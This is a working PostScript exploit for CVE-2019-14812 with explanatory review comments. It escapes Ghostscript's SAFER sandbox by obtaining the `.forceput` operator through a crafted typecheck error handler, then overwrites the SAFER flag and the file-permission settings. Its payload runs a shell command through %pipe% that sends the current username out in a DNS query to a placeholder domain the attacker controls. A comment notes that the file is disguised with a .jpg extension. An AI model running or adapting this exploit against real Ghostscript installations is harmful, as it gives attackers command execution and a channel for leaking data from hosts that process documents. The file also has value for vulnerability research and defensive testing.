%!PS
%%
%% Safer Mode Bypass by `.forceput` Exposure from `setuserparams`
%%
%% Author: Hiroki MATSUKUMA
%%
% println: consume one string from the operand stack and write it to stdout
% followed by a newline.
/println { print (\n) print } bind executeonly def
% info: print a progress message as one line prefixed with "[*] ".
/info { ([*] ) exch concatstrings println } bind executeonly def
% success: print a message as one line prefixed with "[+] ".
/success { ([+] ) exch concatstrings println } bind executeonly def
% fail: print a message as one line prefixed with "[-] ", then abort the
% enclosing execution with `stop` so nothing after the failure runs.
/fail { ([-] ) exch concatstrings println stop } bind executeonly def
% MaxFileSize: upper bound (64 KiB) on how many bytes readfile pulls from a
% file or pipe in one go; anything beyond it is silently left unread.
/MaxFileSize 65536 def
% readfile: filename -> string
% Open the named file read-only, read at most MaxFileSize bytes into a fresh
% buffer, close the file, and leave the bytes actually read (a substring of
% the buffer) on the operand stack.  The EOF flag from readstring is
% discarded, so the caller cannot tell a short file from a truncated read.
% Opening a name that is not permitted under the current file-access policy
% raises the interpreter's usual error (e.g. invalidfileaccess).
/readfile {
(r) file
MaxFileSize string
1 index exch readstring pop
exch closefile
} bind executeonly def
% osexec: command-string -> output-string
% Prefix the command with "%pipe%" and hand it to readfile, i.e. execute it
% through Ghostscript's %pipe% device and return up to MaxFileSize bytes of
% its stdout.  The command text is spliced in verbatim, so whatever shell
% syntax it contains is interpreted by the shell behind %pipe%.  The payload
% at the end of this script writes to a %pipe% file directly rather than
% calling this helper.
/osexec {
dup length 6 add string
dup 0 (%pipe%) putinterval
dup 6 4 -1 roll putinterval
readfile
} bind executeonly def
% --- Banner ---------------------------------------------------------------
% Three strings are pushed and then printed from the top of the stack down;
% the first and third are identical, so the reversed order is invisible.
% NOTE(review): the file is stored with a .jpg extension, but an interpreter
% keys off the `%!PS` magic on the first line, not the name -- presumably the
% extension is there to get the document past content-type filters; not
% something this file states.
(=============================================================================)
(= Safer Mode Bypass by `.forceput` Exposure from `setuserparams` =)
(=============================================================================)
println println println
% --- Stage 1: harvest `.forceput` ------------------------------------------
% `.forceput` is a put that ignores the read-only flag of its target (the
% sanity check in stage 2 is built on exactly that property).  The approach:
% install a custom /typecheck error handler, provoke typecheck errors with
% `null setuserparams`, and on the third error lift an object off the
% operand stack where the failing operator has left internal state.
(Obtaining .forceput operator from setuserparams operator...) info
% Placeholder entry so the later `known` lookup has a defined key.
/.forceput null def
% Keep the stock handler so it can be reinstated once the trick has run.
/&typecheck errordict /typecheck get def
/typecheckcount 0 def
errordict /typecheck {
/typecheckcount typecheckcount 1 add def
% Third typecheck only: `1 index` is the object one below the top of the
% operand stack at the moment the handler runs (the top is the object that
% raised the error); element 5 of it, then element 31 of that, is taken to
% be `.forceput`.  NOTE(review): why the *third* error, and the offsets 5
% and 31, are hard-coded for one Ghostscript build's internal procedure
% layout and are not derived in this file -- expect them to differ across
% versions; the sanity check below is what catches a wrong guess.
typecheckcount 3 eq {
1 index 5 get 31 get
/.forceput exch store
} if
} put
% `null` is not a dictionary, so setuserparams raises typecheck; `clear`
% then empties whatever the aborted operator left on the operand stack.
null setuserparams clear
% Put the original handler back and drop the temporaries from currentdict.
errordict /typecheck currentdict /&typecheck get put
[
/&typecheck
/typecheckcount
] { currentdict exch undef } forall
(A candidate for .forceput operator found!) success
% --- Stage 2: verify the candidate actually bypasses access checks --------
% Try a `.forceput` into a read-only dictionary, where an ordinary `put` is
% refused.  If `overwritten` is still false afterwards the candidate is not
% the real operator and is removed from whichever dict defines it.
(Attempting sanity check with the candidate for .forceput operator...) info
<< /overwritten false >> readonly
begin
currentdict /overwritten true .forceput
overwritten not {
/.forceput where { /.forceput undef } if
} if
end
% No usable `.forceput` -> abort via `stop` before touching any flags.
currentdict /.forceput known not {
(.forceput operator could not found...) fail
} if
(Successfully got .forceput operator!) success
% --- Stage 3: disable SAFER ------------------------------------------------
% With a working `.forceput`, clear the SAFER flag in systemdict and rewrite
% the file-access user parameters; `[(*)]` is presumably a wildcard pattern
% matching every path, and LockFilePermissions=false lets them be changed.
(Overwriting several flags to escape from Safer Mode...) info
systemdict /SAFER false .forceput
userparams /LockFilePermissions false .forceput
userparams /PermitFileControl [(*)] .forceput
userparams /PermitFileWriting [(*)] .forceput
userparams /PermitFileReading [(*)] .forceput
% NOTE(review): presumably here so the interpreter re-reads the modified
% user parameters; not verified from this file.
save restore
SAFER {
(Could not escape from Safer Mode.) fail
} bind executeonly if
(Successfully escaped from Safer Mode!) success
% --- Stage 4: payload ------------------------------------------------------
% Opening a `%pipe%` file for writing hands the rest of the name to a shell
% command (the `(w) file` / `closefile` pair runs it without reading output).
% The command resolves `<whoami>.linux.ghostscript-cve-2019-14812.<TARGET_DOMAIN>`,
% i.e. it exfiltrates the current username inside a DNS query to a domain the
% operator controls -- TARGET_DOMAIN is a placeholder to replace.  `$(whoami)`
% only expands if the pipe is run through a shell; stdout is redirected to
% /tmp/success.  From the defender's side the observable artefact is an
% outbound DNS lookup of that shape from the host rendering the document.
% run command
(%pipe%nslookup $(whoami).linux.ghostscript-cve-2019-14812.TARGET_DOMAIN > /tmp/success) (w) file closefile
quit